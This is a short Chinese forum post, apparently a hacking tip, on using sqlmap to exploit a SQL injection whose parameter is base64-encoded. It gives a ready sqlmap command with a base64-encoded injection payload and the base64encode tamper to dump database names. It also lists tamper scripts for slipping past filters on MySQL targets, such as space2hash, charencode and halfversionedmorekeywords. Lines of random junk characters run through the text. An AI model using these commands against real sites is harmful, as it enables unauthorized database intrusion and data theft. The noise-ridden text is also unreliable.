WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
( Q% u' ~6 u* f
& f* j" P! P' \5 j; E: u5 X4 rsqlmap的tamper里有个base64encode.py9 t/ |0 ~# c" Q6 l8 W6 o' i! h
1 n+ Z+ Q( b( m+ m使用如下$ }8 S3 J4 G6 K7 M4 b
3 f4 H: B# k: Z/ V7 Z- j# Q& m/ Gsqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
- l) B' e$ t+ y& j; s# Z* L
% j' m1 U0 Y/ ]5 c* g( @$ |* Q# G% x; T
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”$ v2 x4 F9 D5 ^" @+ l
# b8 {; l0 A4 T+ @. U; U; w其中常用到的bypass脚本绕过SQLMAP主要两个脚本:+ a5 @# _. k/ y) Q( f9 A2 | [) I3 [
. f% |; m: |; ]0 Y6 s6 e+ P! [/ S2 J
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入
# I$ D3 D/ ^: c+ x/ Sspace2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入
6 \, c4 E7 O4 y- j首先确定目标数据库版本,然后选择相应的脚本。
" D! O$ c5 t- a' N' q5 b) A1 N-v 3 --batch --tamper "space2hash.py"
" n, j& U6 m) i7 b2 j( d
3 H) j9 ?' @3 k- F% e, T( F还有其他一些插件:) {0 m' \: h& O1 H
encodes编码 ——charencode.py
n( |, M+ ?! {& X6 sbase64编码 —— base64encode.py
! V8 r4 x7 L! n6 s, }替换空格和关键字 —— halfversionedmorekeywords.py, `5 Z! f& a- {; l$ \7 b: [
| 0 @1 Y$ L8 R. L! X
0 b/ N0 M; r9 x6 H
; W" x. s! c+ Z' v6 D: x
C& v6 H0 P0 U$ d) ] |